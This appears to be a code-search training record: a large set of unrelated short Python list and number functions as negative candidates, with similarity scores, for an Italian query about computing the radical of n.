lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 4))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 5))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 6))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 7))\r\n preguntas_juego.append(lista_aux)\r\n renglones_preguntas.remove(num_random)\r\n num_preguntas -= 1\r\n elif categ == \"SC\":\r\n preguntas_archivo = arch.leer_archivo(\"Sociales.txt\")\r\n renglones_preguntas = obtener_renglones(preguntas_archivo, subcateg, nivel)\r\n lista_aux = []\r\n while num_preguntas != 0:\r\n num_random = num_rand(0, len(preguntas_archivo))\r\n if num_random in renglones_preguntas:\r\n lista_aux = []\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 3))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 4))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 5))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 6))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 7))\r\n preguntas_juego.append(lista_aux)\r\n renglones_preguntas.remove(num_random)\r\n num_preguntas -= 1\r\n elif categ == \"CT\":\r\n preguntas_archivo = arch.leer_archivo(\"Cultura.txt\")\r\n renglones_preguntas = obtener_renglones(preguntas_archivo, subcateg, nivel)\r\n lista_aux = []\r\n while num_preguntas != 0:\r\n num_random = num_rand(0, len(preguntas_archivo))\r\n if num_random in renglones_preguntas:\r\n lista_aux = []\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 3))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 4))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 5))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 6))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 7))\r\n preguntas_juego.append(lista_aux)\r\n renglones_preguntas.remove(num_random)\r\n num_preguntas -= 1\r\n elif categ == \"ET\":\r\n preguntas_archivo = arch.leer_archivo(\"Entretenimiento.txt\")\r\n renglones_preguntas = obtener_renglones(preguntas_archivo, subcateg, nivel)\r\n lista_aux = []\r\n while num_preguntas != 0:\r\n num_random = num_rand(0, len(preguntas_archivo))\r\n if num_random in renglones_preguntas:\r\n lista_aux = []\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 3))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 4))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 5))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 6))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 7))\r\n preguntas_juego.append(lista_aux)\r\n renglones_preguntas.remove(num_random)\r\n num_preguntas -= 1\r\n elif categ == \"none\":\r\n preguntas_archivo = arch.leer_archivo(\"Ciencias.txt\")\r\n preguntas_archivo.extend(arch.leer_archivo(\"Sociales.txt\"))\r\n preguntas_archivo.extend(arch.leer_archivo(\"Cultura.txt\"))\r\n preguntas_archivo.extend(arch.leer_archivo(\"Entretenimiento.txt\"))\r\n renglones_preguntas = obtener_renglones(preguntas_archivo, nivel=nivel)\r\n lista_aux = []\r\n while num_preguntas != 0:\r\n num_random = num_rand(0, len(preguntas_archivo))\r\n if num_random in renglones_preguntas:\r\n lista_aux = []\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 3))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 4))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 5))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 6))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 7))\r\n preguntas_juego.append(lista_aux)\r\n renglones_preguntas.remove(num_random)\r\n num_preguntas -= 1\r\n \r\n return preguntas_juego", "def lis(n1,n2):\n\ti = 0\n\tif n1 and n2 <= 20:\n\t\tfor x in range(n1,n2+1):\n\t\t\tlis1.append(x*x)\n\t\tlis1.reverse()\n\t\t\n\t\tfor y in lis1:\n\t\t\tif i <=4:\n\t\t\t\tlis2.append(y)\n\t\t\t\ti +=1\n\t\tprint(lis2)\n\telse:\n\t\tprint(\"Value out of range\")", "def genereaza_indivizi(numar_indivizi: int):\n indivizi = list()\n for i in range(0, numar_indivizi):\n indivizi.append(genereaza_codificare())\n return indivizi", "def cal_list_p(self, aux):\r\n list_p = np.array([])\r\n \r\n self.cal_et()\r\n #Para cada vector configuración binaria que etiqueta al elemento del vector A obtenemos un numero decimal sobre el número de elemento, a partir de aqui podemos hacer el calculo de la propagacion\r\n for binn in self.et:\r\n binn_2 = np.append(binn,aux)\r\n dec_p = numListar(binn_2)\r\n dec_p = int(str(dec_p), 2)\r\n list_p = np.append(list_p, [dec_p])\r\n return list_p", "def generar_numeros_pares(n = 100):\n pares = []\n \n contador = 0\n numero = 0\n \n while contador < n:\n if numero % 2 == 0:\n pares.append(numero)\n contador += 1\n \n numero += 1\n \n return pares", "def pretraga_po_cijeni(self, lst, broj):\n pretrazeno = []\n for i in lst:\n if i.cijena == broj:\n pretrazeno.append(i)\n return pretrazeno", "def cal_et(self):\r\n\r\n for ind in range(2**(4*self.k)):\r\n i=0\r\n num = int(bin(ind)[2:])\r\n aux = listarNum(num)\r\n list_num=np.array([])\r\n while i < 4*self.k:\r\n if len(aux) < 4*self.k-i:\r\n list_num=np.append(list_num, [0.])\r\n elif len(aux)==4*self.k-i:\r\n list_num=np.append(list_num, aux)\r\n i=i+1\r\n \"\"\"\r\n reversed_list_num = list_num[::-1]\r\n self.et[ind]=reversed_list_num\r\n \"\"\"\r\n self.et[ind]=list_num", "def primitivas_np2list(primitivas):\n for primitiva in primitivas:\n for key, value in primitiva.items():\n if key[:3]==\"pos\" or key[:3]==\"mag\" or key[:3]==\"dif\":\n try:\n value_temp = value.tolist()\n except AttributeError:\n # pass\n continue\n else:\n primitiva[key] = value_temp \n\n return primitivas", "def cal_list_a(self):\r\n \r\n list_a = np.array([])\r\n \r\n self.cal_et()\r\n #Para cada vector configuración binaria que etiqueta al elemento del vector A obtenemos un numero decimal sobre el número de elemento, a partir de aqui podemos hacer el calculo de la propagacion\r\n list_a = np.array([])\r\n for binn in self.et:\r\n dec_a = numListar(binn)\r\n dec_a = int(str(dec_a), 2)\r\n list_a = np.append(list_a, [dec_a]) \r\n return list_a", "def snr_list(self):\n return [self.snr_one_iteration(q) for q in range(self.N_itr)]", "def scan(self) -> List[int]:", "def scan(self) -> List[int]:", "def nlegomena(self, n: int) -> list:\n nlegomena_ = [typ for typ, freq in self.items() if freq == n]\n return nlegomena_", "def secuencia(R, Q, q):\r\n n = 1\r\n r = []\r\n for qq in q:\r\n for qqq in qq.eps:\r\n r.append(qqq)\r\n r = sorted(r)\r\n\r\n for l in r:\r\n print('la l', l)\r\n Qaux = []\r\n for j in range(len(Q)):\r\n notaux = []\r\n notaux.append(Q[j][0]+j*l[0])\r\n notaux.append(Q[j][1]+(j+1)*l[0])\r\n notaux.append(Q[j][2])\r\n Qaux.append(notaux)\r\n # print(Qaux)\r\n Qaux[-1][1] = R[-1][1]\r\n dibuja(R, Qaux, n)\r\n n += 1", "def listToInt(node):\n digit = 0\n number = 0\n curr_node = node\n while curr_node:\n number += pow(10, digit) * curr_node.val\n curr_node = curr_node.next\n digit += 1\n \n return number", "def power_list():", "def exo3_1(mu,x0,n):\r\n S = []\r\n valeur = x0\r\n S.append(valeur)\r\n for i in range(0,n):\r\n valeur = exo2_1(valeur,mu)\r\n S.append(valeur)\r\n return S", "def pretraga_po_opisu(self, lst, rijec):\n pretrazeno = []\n for i in lst:\n if i.opis.lower().find(rijec.lower()) != -1:\n pretrazeno.append(i)\n return pretrazeno", "def dishlist_prices(n: list) -> list:\r\n return [dish.price for dish in n]", "def getStrs(pre,num):\n result = []\n for i in range(num):\n result.append(pre+str(i))\n return result", "def altnum(n):\n a = []\n for i in range(1, n + 1):\n if i%2 == 0:\n s = - i**2\n else:\n s = i**2\n a.append(s) \n return a", "def numbers(num):\n r = []\n for i in range(num):\n d = len(r)\n r = [1 if i == 0 or i == d else r[i-1]+r[i] for i in range(d+1)]\n yield r", "def icofrac(self):\n nbins = 6\n del_bin = 100.0/nbins\n fracs = []\n for atom in m.atoms:\n fracs.append((float(atom.vp.index[2])/float(sum(atom.vp.index))*100.0))\n bin = int( (float(atom.vp.index[2])/float(sum(atom.vp.index))*100.0) /(100.0/(nbins-1)))\n atom.z = bin+1\n fracs.sort()\n print('Min %: {0}. Max %: {1}'.format(min(fracs),max(fracs)))", "def promedio_disparos():\n with open(\"Basedatos.txt\", \"r\") as bd:\n datos = bd.readlines()\n disparos_totales = 0\n lista_disparos = []\n #se obtienen todos los puntajes\n for x in datos:\n lista = x[:-1].split(\",\")\n lista_disparos.append(lista)\n disparos_totales += int(lista[5]) #se van sumando cada uno de los puntajes\n disparos_totales /= len(lista_disparos) #se divide el puntaje entre el numero de usuarios\n disparos_totales = (round(disparos_totales, 2)) #se redondea el resultado a dos decimales\n print(\"Los disparos totales en promedio para ganar fueron: {}\".format(disparos_totales))", "def filtreNormales(liste):\r\n l=[]\r\n for i in range(len(liste)):\r\n if liste[i][0]!=0: l.append(i)\r\n return l", "def nr_pare(lista):\n nr_elemente_pare = 0\n for i in lista:\n if i % 2 == 0:\n nr_elemente_pare += 1\n return nr_elemente_pare", "def sortStingListByNumber(inlist, n):\n indices = []\n outlist = []\n nums = []\n number = re.compile(ur\"\\d+\")\n # print \"inlist: \", inlist\n for e in inlist:\n cur_nums = re.findall(number, e)\n cur_nums_list = []\n for s in cur_nums:\n cur_nums_list.append(int(s))\n num = int(re.findall(number, e)[n])\n if indices:\n if indices[0] > num:\n indices = [num] + indices\n outlist = [e] + outlist\n nums = [cur_nums_list] + nums\n elif indices[-1] < num:\n indices.append(num)\n outlist = outlist + [e]\n nums = nums + [cur_nums_list]\n for i in range(1, len(indices)):\n if indices[i-1] < num and indices[i] > num:\n indices = indices[:i] + [num] + indices[i:]\n outlist = outlist[:i] + [e] + outlist[i:]\n nums = nums[:i] + [cur_nums_list] + nums[i:]\n else:\n indices.append(num)\n outlist.append(e)\n nums.append(cur_nums_list)\n\n return outlist, nums", "def agregarprecios(obras):\n costos = lt.newList(datastructure='ARRAY_LIST')\n costototal = 0\n z = 1\n while z <= lt.size(obras):\n costofinal = 0\n pesofinal = 0\n costo_area = 0\n costo_volumen = 0\n if lt.getElement(obras,z)['Weight (kg)'] != '':\n costofinal = 72.00 * float(lt.getElement(obras,z)['Weight (kg)'])\n pesofinal += float(lt.getElement(obras,z)['Weight (kg)'])\n if lt.getElement(obras,z)['Diameter (cm)'] != '':\n costo_area = 72.00 * ((2 * 3.1416 * (float(lt.getElement(obras,z)['Diameter (cm)'])/2) * float(lt.getElement(obras,z)['Diameter (cm)']) + 2 * 3.1416 * ((float(lt.getElement(obras,z)['Diameter (cm)'])/2) ** 2))/10000)\n elif (lt.getElement(obras,z)['Height (cm)'] != '') and (lt.getElement(obras,z)['Depth (cm)'] != '') and (lt.getElement(obras,z)['Width (cm)'] != ''):\n costo_area = 72.00 * (((2 * float(lt.getElement(obras,z)['Height (cm)']) * (float(lt.getElement(obras,z)['Depth (cm)']) + float(lt.getElement(obras,z)['Width (cm)']))) + (2 * float(lt.getElement(obras,z)['Depth (cm)']) * float(lt.getElement(obras,z)['Width (cm)'])))/10000)\n elif (lt.getElement(obras,z)['Height (cm)'] != '') and (lt.getElement(obras,z)['Width (cm)'] != ''):\n costo_area = 72.00 * ((float(lt.getElement(obras,z)['Width (cm)']) * float(lt.getElement(obras,z)['Height (cm)']))/10000)\n if (lt.getElement(obras,z)['Diameter (cm)'] != '') and (lt.getElement(obras,z)['Height (cm)'] != ''):\n costo_volumen = 72.00 * (((3.1416 * (float(lt.getElement(obras,z)['Diameter (cm)'])/2) ** 2) * (float(lt.getElement(obras,z)['Height (cm)'])))/1000000)\n elif (lt.getElement(obras,z)['Height (cm)'] != '') and (lt.getElement(obras,z)['Depth (cm)'] != '') and (lt.getElement(obras,z)['Width (cm)'] != ''):\n costo_volumen = 72.00 * ((float(lt.getElement(obras,z)['Width (cm)']) * float(lt.getElement(obras,z)['Height (cm)']) * float(lt.getElement(obras,z)['Depth (cm)']))/1000000)\n if costo_area > costofinal:\n costofinal = costo_area\n if costo_volumen > costofinal:\n costofinal = costo_volumen\n if costofinal == 0:\n costofinal = 48.00\n lt.addLast(costos,lt.newList('ARRAY_LIST'))\n lt.addLast(lt.getElement(costos,z),lt.getElement(obras,z))\n lt.addLast(lt.getElement(costos,z),costofinal)\n costototal += costofinal\n z += 1\n return (costos,costototal,pesofinal)", "def __lista_krawedzi__(self):\n s = 0\n for cell in self.cells: # [ 1 0 12 11] = [kr1 kr2 kr3 kr4]\n s += len(cell) # zlicza ile w kolejnych komurkach pkt (krawedzi) (liczy ile jest w wierszu [1 2 12 11] czyli 4 krawedzie\n\n lista_kr = np.array([[0] * 4] * s, dtype=int)\n\n edgeNum = 0\n for i, cell in enumerate(self.cells):\n nNodes = len(cell)\n for l in range(nNodes):\n if l == nNodes-1:\n lista_kr[edgeNum] = [cell[l], cell[0], i, -1]\n else:\n lista_kr[edgeNum] = [cell[l], cell[l+1], i, -1]\n edgeNum += 1\n\n # [ 1 0 0 1] = [pkt1 pkt2 wl sasiad-jeszcze nie obecny]\n return lista_kr", "def scan(self) -> list[int]:", "def solution(self):\n return [(\"simple 1\", 1.),\n (\"simple 2\", 1.),\n (\"simple 3\", 1.),\n (\"simple 4\", 1.),\n (\"simple 5\", 1.),\n (\"simple 10\", 1.),\n (\"simple 15\", 1.),\n (\"thai 1\", 1.),\n (\"thai 2\", 1.),\n (\"thai 3\", 1.),\n (\"thai 4\", 1.),\n (\"thai 5\", 1.),\n (\"thai 10\", 1.),\n (\"thai 15\", 1.),\n ]", "def sequencia_nao_utilizada(self, serie, sequencia_utilizada):\r\n # python /u1/caixa/nfce.py -p listagem -n 1 300 -s 80 -ib 1\r\n\r\n sequencia_utilizada = sorted(sequencia_utilizada)\r\n inicial = sequencia_utilizada[0]\r\n final = sequencia_utilizada[-1] + 1\r\n\tdic = collections.Counter(sequencia_utilizada)\r\n\tnotas_nao_utilizadas = [i for i in range(inicial, final) if dic[i] == 0]\r\n \r\n nova_listagem = []\r\n for nota in notas_nao_utilizadas:\r\n dnot = {}\r\n dnot[\"docsitcodigo\"] = 999 \r\n dnot[\"descricao\"] = \"Sequencia nao utilizada\"\r\n\t dnot[\"docnumero\"] = nota\r\n dnot[\"docserie\"] = serie\r\n\t nova_listagem.append(dnot)\r\n return nova_listagem", "def _lists_of_n(self, myList, n):\n if len(myList) <= 0:\n return []\n \n if len(myList) <= n:\n return [ myList ]\n\n ret = []\n currentList = []\n count = 0\n for item in myList:\n count = count + 1\n currentList.append(item)\n if count % n == 0:\n ret.append(currentList)\n currentList = []\n if len(currentList) > 0:\n ret.append(currentList)\n return ret", "def intToList(num):\n root_node = ListNode(num % 10)\n curr_node = root_node\n num //= 10\n while num:\n next_node = ListNode(num % 10)\n curr_node.next = next_node\n curr_node = next_node\n num //= 10\n \n return root_node", "def numer(self, a):\n return a", "def __init__(self):\n self.numList=[]", "def fraclist(l, percent):\n return l[:int(round(len(l)*percent/100.0))]", "def numero_a_letras(n):\n especiales = {0: 'cero', 10: 'diez', 11: 'once', 12: 'doce', 13: 'trece', 14: 'catorce', 15: 'quince', 20: 'veinte', 100: 'cien', 1000: 'mil'}\n if n in especiales:\n return especiales[n]\n if n < 100:\n cifras = ['', 'una', 'dos', 'tres', 'cuatro', 'cinco', 'seis', 'siete', 'ocho', 'nueve']\n decenas = ['', 'dieci', 'veinti', 'treinta', 'cuarenta', 'cincuenta', 'sesenta', 'setenta', 'ochenta', 'noventa']\n if n % 10 == 0:\n return decenas[n // 10]\n if n < 30:\n return f\"{decenas[n // 10]}{cifras[n % 10]}\"\n return f\"{decenas[n // 10]} y {cifras[n % 10]}\"\n elif n < 1000:\n centenas = ['', 'ciento', 'doscientas', 'trescientas', 'cuatrocientas', 'quinientas', 'seiscientas', 'setecientas', 'ochocientas', 'novecientas']\n if n % 100 == 0:\n return centenas[n // 100]\n return f\"{centenas[n // 100]} {numero_a_letras(n % 100)}\"\n elif n < 10**6:\n if n < 2000:\n return f\"mil {numero_a_letras(n % 1000)}\"\n if n % 1000 == 0:\n return f\"{numero_a_letras(n // 1000)} mil\"\n return f\"{numero_a_letras(n // 1000)} mil {numero_a_letras(n % 1000)}\"\n else:\n raise ValueError(\"Numero demasiado grande\")", "def mk_lst_trans_met(self):\n\t\telem_rnge_I = [[21,30],[39,44],[46,48],[74,76],[78,80]]\n\t\telem_rnge=[]\n\t\tfor i in elem_rnge_I:\n\t\t\tel_strt=i[0]\n\t\t\tel_end=i[1]\n\t\t\trnge_sect=range(el_strt,el_end+1)\n\t\t\telem_rnge.extend(rnge_sect)\n\t\telements=[]\n\t\tfor i in elem_rnge:\n\t\t\telement=Element.from_Z(i)\t# Indice -> pymatgen element object\n\t\t\telements.append(element)\n\t\treturn elements", "def pretraga_po_roku_trajanja(self, lst, datum):\n pretrazeno = []\n for i in lst:\n if i.rok_trajanja == datum:\n pretrazeno.append(i)\n return pretrazeno", "def info(self, list: list[int], /) -> list[int]:", "def get_tri_list(top_tri):\n\ttri_nums = [1]\n\tval = 1\n\twhile tri_nums[-1] < top_tri:\n\t\ttri_val = int(.5*(val*(val+1)))\n\t\ttri_nums.append(tri_val)\n\t\tval += 1\n\treturn tri_nums", "def diezmar(arr_grande, arr_chico):\n paso = int(len(arr_grande) / len(arr_chico))\n r = arr_grande[::paso]\n return r", "def question_22(list_num: float) -> float:\n list_num.sort()\n return list_num[0:3]", "def errs_tab(n):\n return [10**(q / -10) for q in range(n + 1)]", "def rangoli(n):\r\n alphabet = string.ascii_lowercase\r\n pad = 4*n-3\r\n filler = '-'\r\n initial = [alphabet[n-1]]\r\n top = [alphabet[n-1].center(pad, filler)]\r\n\r\n for i in range(n-2, -1, -1):\r\n initial.append(alphabet[i])\r\n sub_list = initial[:-1]+[alphabet[i]]+list(reversed(initial[:-1]))\r\n sub_seq = filler.join(sub_list).center(pad, filler)\r\n top.append(sub_seq)\r\n\r\n bot = list(reversed(top[:-1]))\r\n result = '\\n'.join(top + bot)\r\n print(result)\r\n return", "def simple_nod(number):\n nod = 2\n temp_list = []\n while nod ** 2 <= number:\n if not number % nod:\n temp_list.append(nod)\n number //= nod\n else:\n nod += 1\n if number > 1:\n temp_list.append(number)\n return temp_list", "def nom(meal, i1):\n # Iterators\n #numOfIts = len(meal)\n #its = [i1 for i1 in range(0,numOfIts)]\n #its = [0,2,1,6, len(meal)]\n #its = createIts(meal)\n numOfIts = len(its)\n \n newnom = 0\n for i2 in range(0,numOfIts):\n newnom += int(meal[its[i2]+i1]) + primes[i2]\n #print(primes[i2])\n #print(\"newnom =\", newnom)\n \n newnom = str(newnom % 10)\n return newnom", "def backm(self,numero):\n try:\n for x in range(numero):\n self.tiempos.anterior()\n except StopIteration:\n return", "def question_21(list_num: float) -> float:\n list_num.sort(reverse=True)\n return list_num[0:3]" ]
[ "0.6289262", "0.62472546", "0.6225951", "0.61801213", "0.60700405", "0.59977514", "0.5939416", "0.5908262", "0.5887603", "0.585121", "0.5849568", "0.5843982", "0.5811617", "0.57871395", "0.57503945", "0.5743789", "0.57214135", "0.5715634", "0.56780475", "0.56768674", "0.5663247", "0.56263644", "0.56258327", "0.56230813", "0.56213623", "0.5619831", "0.55943686", "0.55861884", "0.55855715", "0.55831647", "0.55790097", "0.5573001", "0.5569425", "0.55675435", "0.5566071", "0.55644476", "0.5560046", "0.55580145", "0.55521", "0.5536439", "0.5529961", "0.5529958", "0.552982", "0.5516577", "0.5512209", "0.55090404", "0.5489616", "0.5469032", "0.5460448", "0.5460192", "0.5460098", "0.54413635", "0.5440813", "0.54378045", "0.5437153", "0.54338235", "0.5420394", "0.5413145", "0.54128844", "0.5410829", "0.5407284", "0.5401289", "0.5401289", "0.53995985", "0.53995633", "0.5396819", "0.5395304", "0.5393529", "0.53898656", "0.5384749", "0.53778625", "0.5376866", "0.53718984", "0.5364748", "0.53640693", "0.53537285", "0.53518456", "0.53504723", "0.5348947", "0.5343388", "0.53382915", "0.53327894", "0.53180593", "0.5316748", "0.53166944", "0.5312521", "0.53099304", "0.5303231", "0.5300756", "0.52967453", "0.52938735", "0.5291439", "0.52900094", "0.5289519", "0.5288808", "0.5288358", "0.5286855", "0.5274454", "0.52744037", "0.52730167", "0.52702004" ]
0.0
-1
Restituisce il radicale di n
def radicale(n): r = 1 for p in primi(n+1): if p>n: break if n%p==0: r *= p n = n//p return r
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def n_wyraz(a1,nr_wyrazu,r):\n return a1+(nr_wyrazu-1)*r", "def Arn(r, n):\n ret = 1\n for t in range(n, n-r+1-1, -1):\n ret *= t\n return ret", "def _rnm(self, n, m, r):\n r_sum = 0\n m = int(abs(m))\n u = int((n-m)/2)\n v = int((n+m)/2)\n for s in range(0, u+1):\n numerator = pow(-1, s) * math.factorial(int(n-s)) * pow(r, n-2*s)\n try:\n denominator = math.factorial(s) * math.factorial(v-s) * math.factorial(u-s)\n except ValueError:\n raise ValueError('(s,n,m,u,v) = (%d,%d,%d,%d,%d)' % (s, n, m, u, v))\n r_sum += numerator / denominator\n return r_sum", "def radrad(rxn_class):\n return rxn_class[2]", "def rad(x) :#en mm!\r\n return topdia(x)/2.0", "def nCr():\n return math.factorial(self.nn) / (math.factorial(self.rr) * math.factorial(self.nn - self.rr))", "def calculateSNR(self):\n pass", "def _r_at_interface(self, polarization, n_1, n_2):\n if polarization == 's':\n return ((n_1-n_2)/(n_1+n_2))\n elif polarization == 'p':\n return ((n_1-n_2)/(n_1+n_2))\n else:\n raise ValueError(\"Polarization must be 's' or 'p'\")", "def nCWRk(n, r):\n val = 1\n for i in range(1, r+1):\n val *= n + r - i\n val //= i\n return val", "def get_n1(r,N):\n n1 = N - np.sum(r)\n return n1", "def ncr(n, r):\n r = min(r, n-r)\n if r == 0:\n return 1\n if r < 0:\n return 0\n numer = reduce(op.mul, xrange(n, n-r, -1))\n denom = reduce(op.mul, xrange(1, r+1))\n return numer / denom", "def buscarRecorrido(n):\n #se llama la función para generar una matriz de tamaño N x N\n dist = generarMatriz(n)\n #empezamos con la ciudad 0\n primCiudad = 0\n\n arbol = ArbolNario(primCiudad,n)\n nodo = arbol.getRaiz()\n\n startTime = timeit.default_timer()#Comienzo del algoritmo Hill-Climbing\n while(nodo.getHijos().size > 0):\n hijos = nodo.getHijos()\n nodo = encontrarMejor(nodo.getId(), hijos, dist) \n exeTime = round((timeit.default_timer() - startTime)*SEC_A_MICRO,1)\n return obtenerRecorrido(nodo, dist), exeTime", "def n(self):\n pass", "def Crn(r, n):\n ret = 1\n if(r>n/2):\n return Crn(n-r, n)\n for t in range(n, n-r+1-1, -1):\n ret *= t\n return ret/fact(r)", "def update_RL(self, n):\n newR = self._mps_RL(self.R[n], self.A[n], self.A[n])\n if n == self.L - 1:\n self.R[self.L + 1] = newR.flat[0]\n else:\n self.R[n + 1] = newR", "def nr():\n pass", "def factR(n):\n if n == 1:\n return n\n return n*factR(n-1)", "def rof(number):\n\n return round(number * 2) / 2", "def getR(self):\n # Reynolds number uses the absolute value of the velocity\n V = abs(self.V)\n return (V * self.D) / self.v # formula for Reynolds number", "def ComputeNrb(self):\r\n pass", "def n_suma(a1,nr_wyrazu,r):\n return (2*a1+(nr_wyrazu-1))*nr_wyrazu/2", "def _n_ball_rad(n, vol):\n unitvol = _n_ball_vol(n, 1)\n radius = (vol / unitvol) ** (1.0 / n)\n return radius", "def item_tres(n):\n if n <= 0.167:\n return 0\n elif n > 0.167 and n <= 0.333:\n return 1\n elif n > 0.333 and n <= 0.500:\n return 2\n elif n > 0.500 and n <= 0.667:\n return 3\n elif n > 0.667 and n <= 0.834:\n return 4\n elif n > 0.834 and n <= 1.000:\n return 5", "def _irep_to_value(self,n,i):\n if i == 1:\n j,k = divmod(n,9)\n v = (k+1)*10**j\n return v\n else:\n j,k = divmod(n,int(10.0/i))\n if k == 0:\n v = 10**j\n else:\n v = i*k*10**j\n return v", "def fact_r(n):\n \n if n == 1:\n return n\n \n return n * fact_r(n-1)", "def reciprocal(self):\n return Rational(self.denominator, self.numerator)", "def ne(n):\n return 4*n*n - 2*n + 1", "def toRadString(self):\r\n pass", "def nw(n):\n return 4*n*n + 1", "def Get_direction(n):\n if abs(n) == 0:\n return 0\n else:\n return n / abs(n)", "def update_RR(self, n):\n newR = self._mps_RR(self.R[n + 1], self.A[n], self.A[n])\n if n == 0:\n self.R[self.L + 1] = newR.flat[0]\n else:\n self.R[n] = newR", "def I (self, n):", "def mirror(n):\n return (n % 10)*10 + (n // 10)", "def zernike_rad(m, n, rho):\n if (n < 0 or m < 0 or abs(m) > n):\n raise ValueError\n if ((n-m) % 2):\n return rho*0.0\n pre_fac = lambda k: (-1.0)**k * fac(n-k) / ( fac(k) * fac( (n+m)/2.0 - k ) * fac( (n-m)/2.0 - k ) )\n return sum(pre_fac(k) * rho**(n-2.0*k) for k in xrange((n-m)/2+1))", "def _mass_radius_relation(R, A, n):\n\n M = A * (R ** ((3 - n) / (1 - n)))\n return M", "def wr(nr):\n return (1 - nr) if nr < 1.0 else 0.0", "def octagonal(n: int) -> int:\n return int(n * (3 * n - 2))", "def cuadrado(n):\n cuadrado=n**2\n print n, \"al cuadrado es\", cuadrado\n return cuadrado", "def ndcg_at_k(self, r, k, method=0):\n # print(\"sorted:\" + str(sorted(r, reverse=True)))\n # 排完序最理想的結果分數\n dcg_max = self.dcg_at_k(sorted(r, reverse=True), k, method)\n # print(\"dcg_max:\" + str(dcg_max))\n if not dcg_max:\n return 0.\n return self.dcg_at_k(r, k, method) / dcg_max", "def reprographie():\n nombreDePhotocopie = int(input(\"Entrez le nombre de photocopie a effectuer \"))\n PREMIER_PRIX = 0.10\n DEUXIEME_PRIX = 0.09\n TROISIEME_PRIX = 0.08\n PREMIERE_TRANCHE = 10\n DEUXIEME_TRANCHE = 20\n TROISIEME_TRANCHE = 30\n resultat = 0\n if(nombreDePhotocopie>TROISIEME_TRANCHE):\n resultat = DEUXIEME_TRANCHE*DEUXIEME_PRIX+1+(nombreDePhotocopie-30)*TROISIEME_PRIX\n elif(nombreDePhotocopie<=TROISIEME_TRANCHE):\n if(nombreDePhotocopie/10>1):\n resultat = (nombreDePhotocopie-10)*DEUXIEME_PRIX+(PREMIERE_TRANCHE*PREMIER_PRIX)\n else:\n resultat = nombreDePhotocopie*PREMIER_PRIX\n return resultat", "def stirling(n):\n return n**n*isqrt(2*math.pi*n)/math.e**n", "def get_rm(g):\n return 1 / g", "def calc_ri(n2,bx,f):\n\n Ri = (f**2*n2)/np.abs(bx)**2\n modRi = np.arctan(-Ri**-1)\n return Ri, modRi", "def list_to_nine(n):\n if n < 10:\n print(n)\n else: \n print(n, end=\", \")\n n = abs(n - mirror(n))\n list_to_nine(n)", "def nonlinear_refractive_index(name):\n if name == 'Ne':\n return 8e-9 # cm^2/TW\n elif name == 'He':\n return 3e-9\n elif name == 'Ar':\n return 1e-7\n else:\n raise ValueError('Unknown substance %s' % name)", "def n():\n # For documentation purposes", "def getRadix(self, settings: ghidra.docking.settings.Settings) -> int:\n ...", "def n_choose_r(n, r):\n if r == 1:\n return n\n elif r == n:\n return 1\n elif r == 0 or n == 0:\n return 0\n else:\n return n_choose_r(n-1, r-1) + n_choose_r(n-1, r)", "def rotate_RT_NE(n, e, ba):\n ba = 360.0 - ba\n return rotate_NE_RT(n, e, ba)", "def J (self, n):", "def triangular_number(n):\n return n*(n+1) / 2", "def silnia_it(n):\n wynik = 1\n \n for i in range(1, n + 1):\n wynik = wynik * i\n return wynik", "def get_tribonnaci(self, n):\n if n not in self.numbers:\n current_n = max(self.numbers)\n while current_n < n:\n current_n += 1\n self.numbers[current_n] = self.numbers[current_n - 1] + \\\n self.numbers[current_n - 2] + \\\n self.numbers[current_n - 3]\n return self.numbers[n]", "def nze(self) -> int:", "def nze(self) -> int:", "def net_r(self):\r\n try: q = 0 if self.ref.q is None else self.ref.q\r\n except: q = 0\r\n\r\n frf_r = 0 if self.frf_r is None else self.frf_r\r\n rf_r = 0 if self.rf_r is None else self.rf_r\r\n\r\n return rf_r - q - frf_r # calculate RFR net of yield and foreign RFR\r", "def refract(ki,n,mi,mt):\n ki,n,mi,mt = map(np.asarray, (ki,n,mi,mt))\n return Fresnel._refract(ki,n,mi,mt)", "def inner_rad(self) -> Quantity:\n return self._inner_rad", "def fun_lorentzian(p,r):\n return p[1] / ((r/p[0])**2 + 1)", "def TNR(self):\n return _div(self.TN, self.FP + self.TN)", "def __rshift__(self, n: int) -> 'SInt':\r\n if type(n) != int or n < 0:\r\n raise TypeError(\"Wrong type for n : positive integer needed\")\r\n n = min(n, len(self) - 1)\r\n S = SInt(self.nbBytes)\r\n S.binaire = self.signe + '0' * n + self.binaire[1:-n]\r\n return S", "def dirac(self,n):\r\n y = np.zeros(len(n),dtype = complex)\r\n y[n==0] = 1\r\n return y", "def _rawprng(self):\n self.p += 1 \n if self.p >= self.o:\n\t\t\tself.p = 0\n t = 1768863 * self.s[self.p] + self.c * 2.3283064365386963e-10\n self.c = int(t) | 0\n self.s[self.p] = t - self.c\n return self.s[self.p]", "def __make_numerator_integer(self):\n while self.numerator % 1 !=0:\n self.denominator *=10\n self.numerator *=10", "def radius_to_annulus(r,annuli):\n if r < R_in:\n return -1\n for annulus in range(len(annuli)):\n if annuli[annulus] == 